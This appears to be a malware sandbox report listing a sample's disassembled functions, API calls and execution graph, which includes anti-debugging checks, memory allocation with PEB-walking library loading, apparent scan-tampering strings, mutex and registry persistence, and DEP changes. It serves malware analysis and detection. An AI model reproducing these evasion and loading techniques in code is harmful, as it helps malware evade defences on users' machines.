                                        • GetModuleHandleW.KERNEL32(KernelBase,?,02B4EF98,UacInitialize,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,Initialize), ref: 02B4EB9A
                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B4EBAC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: IsDebuggerPresent$KernelBase
                                        • API String ID: 1646373207-2367923768
                                        • Opcode ID: 21bb1a2931f7a878eed3ccd4a1a88f9545ac7d41e8f884706987a3a1fc008098
                                        • Instruction ID: 793cd5d293903897675e8ac27624fb538e52337364cfc0f18b4aa6a952c83fc1
                                        • Opcode Fuzzy Hash: 21bb1a2931f7a878eed3ccd4a1a88f9545ac7d41e8f884706987a3a1fc008098
                                        • Instruction Fuzzy Hash: D4D012A2795B102EBA023AF40CC4C5E13CDAB0556A3201EF1F023D20E2EAAAC8126514
                                        Function 02B3C3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B5C10B,00000000,02B5C11E), ref: 02B3C402
                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B3C413
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                        • API String ID: 1646373207-3712701948
                                        • Opcode ID: 9c04234980aa73848886520a3e0da82f36944737878674255a86bc96b90d42b1
                                        • Instruction ID: 76e19df2c1db5cdce905b25b7b718485ac3574a063d07ec87583f0210f506eff
                                        • Opcode Fuzzy Hash: 9c04234980aa73848886520a3e0da82f36944737878674255a86bc96b90d42b1
                                        • Instruction Fuzzy Hash: 54D05EA0A803125EE3035AF168807323AC897047A4B4469E6A001AA101C77584244F88
                                        Function 02B3E170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B3E21F
                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B3E23B
                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B3E2B2
                                        • VariantClear.OLEAUT32(?), ref: 02B3E2DB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                        • String ID:
                                        • API String ID: 920484758-0
                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                        • Instruction ID: e46c25563e726ce573315ed21d053423b56d3b2b0e4dddc2ab81f73c2469ad48
                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                        • Instruction Fuzzy Hash: 2741D7B5A0161A9BCB62DB58CC90BD9B3BDFF49214F0042E6E649E7251DA30EF848F50
                                        Function 02B3ACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B3ACE1
                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B3AD05
                                        • GetModuleFileNameA.KERNEL32(02B30000,?,00000105), ref: 02B3AD20
                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B3ADB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                        • String ID:
                                        • API String ID: 3990497365-0
                                        • Opcode ID: ea429f9c7e13ff1e4cad40957eab5680915dc78e312ff9595073bf97ccaadbe4
                                        • Instruction ID: 902e1776d75b7417f4da616ca219c1ff5d9930df95d0fb684b1972cf5755f643
                                        • Opcode Fuzzy Hash: ea429f9c7e13ff1e4cad40957eab5680915dc78e312ff9595073bf97ccaadbe4
                                        • Instruction Fuzzy Hash: D3415E71A40258ABDB22EF68CD84BDEB7FDAB18341F1044E5A648E7241DB749F84CF50
                                        Function 02B3ACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B3ACE1
                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B3AD05
                                        • GetModuleFileNameA.KERNEL32(02B30000,?,00000105), ref: 02B3AD20
                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B3ADB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                        • String ID:
                                        • API String ID: 3990497365-0
                                        • Opcode ID: 356ba370ff3003e8070c62a4b557fbaf0a480e4f0b30205efb95c7c3884491d4
                                        • Instruction ID: f3f9c25368c7a726692c302b7792ab0c5fbb65730a00338338b6b2a0aea3478b
                                        • Opcode Fuzzy Hash: 356ba370ff3003e8070c62a4b557fbaf0a480e4f0b30205efb95c7c3884491d4
                                        • Instruction Fuzzy Hash: 37417E71A40258AFDB22EB68CD80BDAB7FDAB18341F1004E5A648E7241DB749F88CF50
                                        Function 02B31C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f790ce3378fdd357947ca7adb00c0bb585eae73905edb00ef1c1fa634e8ecbc9
                                        • Instruction ID: ac45da1217b1158871f6d30d23fba14d951a93393ee92ccf54ad5a6ec0843f84
                                        • Opcode Fuzzy Hash: f790ce3378fdd357947ca7adb00c0bb585eae73905edb00ef1c1fa634e8ecbc9
                                        • Instruction Fuzzy Hash: F8A1E6B67306100BE71AAA7C9C843ADB3CADBC5365F1C82BEE11DCB381DB64C9568650
                                        Function 02B39474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B39562), ref: 02B394FA
                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B39562), ref: 02B39500
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: DateFormatLocaleThread
                                        • String ID: yyyy
                                        • API String ID: 3303714858-3145165042
                                        • Opcode ID: bb6991610b6d66dc8d4746e99c208fdbc1972fba51690846107cc9c15237df5f
                                        • Instruction ID: 68f6054f401a1b31665db337340fc6ab560e9ec4c5ce3656ac92bf79352a6a61
                                        • Opcode Fuzzy Hash: bb6991610b6d66dc8d4746e99c208fdbc1972fba51690846107cc9c15237df5f
                                        • Instruction Fuzzy Hash: D1217C76A00618AFDB12DFA8C881AEEB3B9EF48710F4240E5F905E7251D774DE44CBA5
                                        Function 02B4818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B48216), ref: 02B481F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                        • String ID: FlushInstructionCache$Kernel32
                                        • API String ID: 3811539418-184458249
                                        • Opcode ID: c9e1e5f67e49dbc3935d446bbcab483fbdd225fcc65cb72d0c7bda2a820a6baa
                                        • Instruction ID: 7221b52aa8ea4171a7175cbb59b9ff158040cd8c29b4e46a1a26e02a74b17097
                                        • Opcode Fuzzy Hash: c9e1e5f67e49dbc3935d446bbcab483fbdd225fcc65cb72d0c7bda2a820a6baa
                                        • Instruction Fuzzy Hash: 43016D75654304BFEB12EFA8DC81F5E77BDE748B50F6184A0F904E7640DA74AD10AB24
                                        Function 02B4AD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B4AD98
                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B4ADC8
                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B4ADE7
                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B4ADF3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Read$Write
                                        • String ID:
                                        • API String ID: 3448952669-0
                                        • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                        • Instruction ID: 054beccc49b2794c13e9dd087c832d45c1f701d4c9c8ab23214468ca46e7e676
                                        • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                        • Instruction Fuzzy Hash: 0821B4B5A80619ABDF10DF69CCC0BAE77B9EF44352F004191EE1097344EF34D911EAA4

                                        Execution Graph

                                        Execution Coverage:1.4%
                                        Dynamic/Decrypted Code Coverage:98.3%
                                        Signature Coverage:5%
                                        Total number of Nodes:974
                                        Total number of Limit Nodes:44
                                        execution_graph 92855 68d16cb 92856 68d16d4 92855->92856 92858 68d18ba 92856->92858 92859 68d190d 92856->92859 92860 68d10dc 92859->92860 92862 68d1964 92860->92862 92863 68d10f0 92860->92863 92862->92856 92866 68d1117 92863->92866 92867 68d1149 92866->92867 92868 68d1278 VirtualAlloc 92867->92868 92875 68d1106 92867->92875 92869 68d12a8 VirtualAlloc 92868->92869 92871 68d12bb GetPEB 92868->92871 92869->92871 92869->92875 92872 68d1384 92871->92872 92873 68d143c GetPEB 92872->92873 92874 68d13ed LoadLibraryA 92872->92874 92873->92875 92874->92872 92874->92875 92876 4ab263c 92877 4ab2648 ___FrameUnwindToState 92876->92877 92903 4ab234b 92877->92903 92879 4ab264f 92881 4ab2678 92879->92881 93173 4ab27ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 92879->93173 92886 4ab26b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 92881->92886 93174 4ac1763 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 92881->93174 92883 4ab2691 92885 4ab2697 ___FrameUnwindToState 92883->92885 93175 4ac1707 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 92883->93175 92892 4ab2717 92886->92892 93176 4ac08e7 35 API calls 5 library calls 92886->93176 92914 4ab28c9 92892->92914 92904 4ab2354 92903->92904 93181 4ab29da IsProcessorFeaturePresent 92904->93181 92906 4ab2360 93182 4ab6cd1 10 API calls 4 library calls 92906->93182 92908 4ab2365 92909 4ab2369 92908->92909 93183 4ac15bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92908->93183 92909->92879 92911 4ab2372 92912 4ab2380 92911->92912 93184 4ab6cfa 8 API calls 3 library calls 92911->93184 92912->92879 93185 4ab4c30 92914->93185 92917 4ab271d 92918 4ac16b4 92917->92918 93187 4acc239 92918->93187 92920 4ab2726 92923 4a8d3f0 92920->92923 92922 4ac16bd 92922->92920 93191 4ac3d25 35 API calls 92922->93191 93193 4a9a8da LoadLibraryA GetProcAddress 92923->93193 92925 4a8d40c 93200 4a8dd83 92925->93200 92927 4a8d415 93215 4a820d6 92927->93215 92930 4a820d6 28 API calls 92931 4a8d433 92930->92931 93221 4a99d87 92931->93221 92935 4a8d445 93247 4a81e6d 92935->93247 92937 4a8d44e 92938 4a8d4b8 92937->92938 92939 4a8d461 92937->92939 93253 4a81e45 92938->93253 93503 4a8e609 114 API calls 92939->93503 92942 4a8d4c6 92946 4a81e45 22 API calls 92942->92946 92943 4a8d473 92944 4a81e45 22 API calls 92943->92944 92945 4a8d47f 92944->92945 93504 4a8f98d 36 API calls __EH_prolog 92945->93504 92947 4a8d4e5 92946->92947 93258 4a852fe 92947->93258 92950 4a8d4f4 93263 4a88209 92950->93263 92951 4a8d491 93505 4a8e5ba 75 API calls 92951->93505 92955 4a8d49a 93506 4a8dd70 68 API calls 92955->93506 92964 4a81fb8 11 API calls 92965 4a8d520 92964->92965 92966 4a81e45 22 API calls 92965->92966 92967 4a8d529 92966->92967 93280 4a81fa0 92967->93280 92969 4a8d534 92970 4a81e45 22 API calls 92969->92970 92971 4a8d54f 92970->92971 92972 4a81e45 22 API calls 92971->92972 92974 4a8d569 92972->92974 92973 4a8d5cf 92976 4a81e45 22 API calls 92973->92976 92974->92973 93507 4a8822a 92974->93507 92980 4a8d5dc 92976->92980 92977 4a8d594 92978 4a81fc2 28 API calls 92977->92978 92979 4a8d5a0 92978->92979 92982 4a81fb8 11 API calls 92979->92982 92981 4a8d650 92980->92981 92983 4a81e45 22 API calls 92980->92983 92985 4a8d660 CreateMutexA GetLastError 92981->92985 92984 4a8d5a9 92982->92984 92986 4a8d5f5 92983->92986 93512 4a91f34 RegOpenKeyExA 92984->93512 92987 4a8d67f GetModuleFileNameW 92985->92987 92988 4a8d991 92985->92988 92990 4a8d5fc OpenMutexA 92986->92990 93284 4a992ae 92987->93284 92992 4a81fb8 11 API calls 92988->92992 92993 4a8d60f WaitForSingleObject CloseHandle 92990->92993 92994 4a8d622 92990->92994 93015 4a8d99a ___scrt_get_show_window_mode 92992->93015 92993->92994 92999 4a91f34 3 API calls 92994->92999 92997 4a8d6a0 93000 4a8d6f5 92997->93000 93003 4a81e45 22 API calls 92997->93003 92998 4a8dd0f 93587 4a9239a 30 API calls 92998->93587 93007 4a8d63b 92999->93007 93002 4a81e45 22 API calls 93000->93002 93005 4a8d720 93002->93005 93008 4a8d6bf 93003->93008 93004 4a8dd22 93588 4a90eda 65 API calls ___scrt_get_show_window_mode 93004->93588 93009 4a8d72c 93005->93009 93010 4a8d731 93005->93010 93007->92981 93515 4a9239a 30 API calls 93007->93515 93008->93000 93016 4a8d6f7 93008->93016 93022 4a8d6db 93008->93022 93519 4a8e501 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 93009->93519 93014 4a81e45 22 API calls 93010->93014 93012 4a82073 28 API calls 93017 4a8dd3a 93012->93017 93024 4a8d73a 93014->93024 93581 4a920e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 93015->93581 93517 4a91eea RegOpenKeyExA RegQueryValueExA RegCloseKey 93016->93517 93412 4a852dd 93017->93412 93020 4a8dd4a 93021 4a82073 28 API calls 93020->93021 93026 4a8dd59 93021->93026 93022->93000 93516 4a867a0 36 API calls ___scrt_get_show_window_mode 93022->93516 93029 4a81e45 22 API calls 93024->93029 93031 4a994da 77 API calls 93026->93031 93027 4a8d70d 93027->93000 93028 4a8d712 93027->93028 93518 4a866a6 58 API calls 93028->93518 93033 4a8d755 93029->93033 93030 4a8d9ec 93034 4a81e45 22 API calls 93030->93034 93035 4a8dd5e 93031->93035 93039 4a81e45 22 API calls 93033->93039 93036 4a8da10 93034->93036 93037 4a81fb8 11 API calls 93035->93037 93311 4a82073 93036->93311 93038 4a8dd6a 93037->93038 93414 4a93980 93038->93414 93042 4a8d76f 93039->93042 93041 4a8dd6f 93045 4a81e45 22 API calls 93042->93045 93044 4a8da22 93317 4a9215f RegCreateKeyA 93044->93317 93047 4a8d789 93045->93047 93051 4a81e45 22 API calls 93047->93051 93049 4a81e45 22 API calls 93050 4a8da44 93049->93050 93323 4ab9867 93050->93323 93053 4a8d7a3 93051->93053 93054 4a8d810 93053->93054 93056 4a81e45 22 API calls 93053->93056 93054->93015 93058 4a8d828 93054->93058 93095 4a8d8a7 ___scrt_get_show_window_mode 93054->93095 93067 4a8d7b8 _wcslen 93056->93067 93057 4a8da61 93582 4a9aa4f 79 API calls ___scrt_get_show_window_mode 93057->93582 93061 4a81e45 22 API calls 93058->93061 93059 4a8da7e 93060 4a82073 28 API calls 93059->93060 93063 4a8da8d 93060->93063 93064 4a8d831 93061->93064 93066 4a82073 28 API calls 93063->93066 93070 4a81e45 22 API calls 93064->93070 93065 4a8da70 CreateThread 93065->93059 94071 4a9b212 10 API calls 93065->94071 93068 4a8da9c 93066->93068 93067->93054 93072 4a81e45 22 API calls 93067->93072 93327 4a994da 93068->93327 93073 4a8d843 93070->93073 93075 4a8d7d3 93072->93075 93077 4a81e45 22 API calls 93073->93077 93074 4a81e45 22 API calls 93076 4a8daad 93074->93076 93079 4a81e45 22 API calls 93075->93079 93080 4a81e45 22 API calls 93076->93080 93078 4a8d855 93077->93078 93083 4a81e45 22 API calls 93078->93083 93081 4a8d7e8 93079->93081 93082 4a8dabf 93080->93082 93520 4a8c5ed 93081->93520 93087 4a81e45 22 API calls 93082->93087 93085 4a8d87e 93083->93085 93091 4a81e45 22 API calls 93085->93091 93089 4a8dad5 93087->93089 93088 4a81ef3 28 API calls 93090 4a8d807 93088->93090 93094 4a81e45 22 API calls 93089->93094 93092 4a81ee9 11 API calls 93090->93092 93093 4a8d88f 93091->93093 93092->93054 93578 4a8b871 46 API calls _wcslen 93093->93578 93096 4a8daf5 93094->93096 93301 4a92338 93095->93301 93101 4ab9867 _strftime 39 API calls 93096->93101 93099 4a8d942 ctype 93104 4a81e45 22 API calls 93099->93104 93100 4a8d89f 93100->93095 93102 4a8db02 93101->93102 93103 4a81e45 22 API calls 93102->93103 93105 4a8db0d 93103->93105 93106 4a8d959 93104->93106 93107 4a81e45 22 API calls 93105->93107 93106->93030 93108 4a8d96d 93106->93108 93110 4a8db1e 93107->93110 93109 4a81e45 22 API calls 93108->93109 93111 4a8d976 93109->93111 93351 4a88f1f 93110->93351 93579 4a99bca 28 API calls 93111->93579 93114 4a8d982 93580 4a8de34 88 API calls 93114->93580 93117 4a81e45 22 API calls 93119 4a8db3c 93117->93119 93118 4a8d987 93118->92988 93118->93030 93120 4a8db4a 93119->93120 93121 4a8db83 93119->93121 93583 4ab229f 22 API calls 3 library calls 93120->93583 93123 4a81e45 22 API calls 93121->93123 93125 4a8db91 93123->93125 93124 4a8db53 93126 4a81e45 22 API calls 93124->93126 93128 4a8dbd9 93125->93128 93129 4a8db9c 93125->93129 93127 4a8db65 93126->93127 93132 4a8db6c CreateThread 93127->93132 93131 4a81e45 22 API calls 93128->93131 93584 4ab229f 22 API calls 3 library calls 93129->93584 93134 4a8dbe2 93131->93134 93132->93121 94072 4a97f6a 99 API calls 2 library calls 93132->94072 93133 4a8dba5 93135 4a81e45 22 API calls 93133->93135 93137 4a8dc4c 93134->93137 93138 4a8dbed 93134->93138 93136 4a8dbb6 93135->93136 93139 4a8dbbd CreateThread 93136->93139 93141 4a81e45 22 API calls 93137->93141 93140 4a81e45 22 API calls 93138->93140 93139->93128 94069 4a97f6a 99 API calls 2 library calls 93139->94069 93142 4a8dbfc 93140->93142 93143 4a8dc55 93141->93143 93144 4a81e45 22 API calls 93142->93144 93145 4a8dc99 93143->93145 93146 4a8dc60 93143->93146 93148 4a8dc11 93144->93148 93388 4a995f8 93145->93388 93147 4a81e45 22 API calls 93146->93147 93151 4a8dc69 93147->93151 93585 4a8c5a1 31 API calls 93148->93585 93156 4a81e45 22 API calls 93151->93156 93160 4a8dc7e 93156->93160 93157 4a8dc24 93159 4a81ef3 28 API calls 93157->93159 93163 4a8dc30 93159->93163 93169 4ab9867 _strftime 39 API calls 93160->93169 93161 4a8dcc1 SetProcessDEPPolicy 93162 4a8dcc4 CreateThread 93161->93162 93164 4a8dcd9 CreateThread 93162->93164 93165 4a8dce5 93162->93165 94041 4a8e18d 93162->94041 93166 4a81ee9 11 API calls 93163->93166 93164->93165 94073 4a90b5c 135 API calls 93164->94073 93167 4a8dcfa 93165->93167 93168 4a8dcee CreateThread 93165->93168 93170 4a8dc39 CreateThread 93166->93170 93167->93012 93167->93038 93168->93167 94068 4a91140 38 API calls ___scrt_get_show_window_mode 93168->94068 93171 4a8dc8b 93169->93171 93170->93137 94070 4a81bc9 49 API calls _strftime 93170->94070 93586 4a8b0a3 7 API calls 93171->93586 93173->92879 93174->92883 93175->92886 93176->92892 93181->92906 93182->92908 93183->92911 93184->92909 93186 4ab28dc GetStartupInfoW 93185->93186 93186->92917 93188 4acc24b 93187->93188 93189 4acc242 93187->93189 93188->92922 93192 4acc138 48 API calls 4 library calls 93189->93192 93191->92922 93192->93188 93194 4a9a919 LoadLibraryA GetProcAddress 93193->93194 93195 4a9a909 GetModuleHandleA GetProcAddress 93193->93195 93196 4a9a947 GetModuleHandleA GetProcAddress 93194->93196 93197 4a9a937 GetModuleHandleA GetProcAddress 93194->93197 93195->93194 93198 4a9a95f GetModuleHandleA GetProcAddress 93196->93198 93199 4a9a973 24 API calls 93196->93199 93197->93196 93198->93199 93199->92925 93589 4a99493 FindResourceA 93200->93589 93204 4a8ddad _Yarn 93599 4a82097 93204->93599 93207 4a81fc2 28 API calls 93208 4a8ddd3 93207->93208 93209 4a81fb8 11 API calls 93208->93209 93210 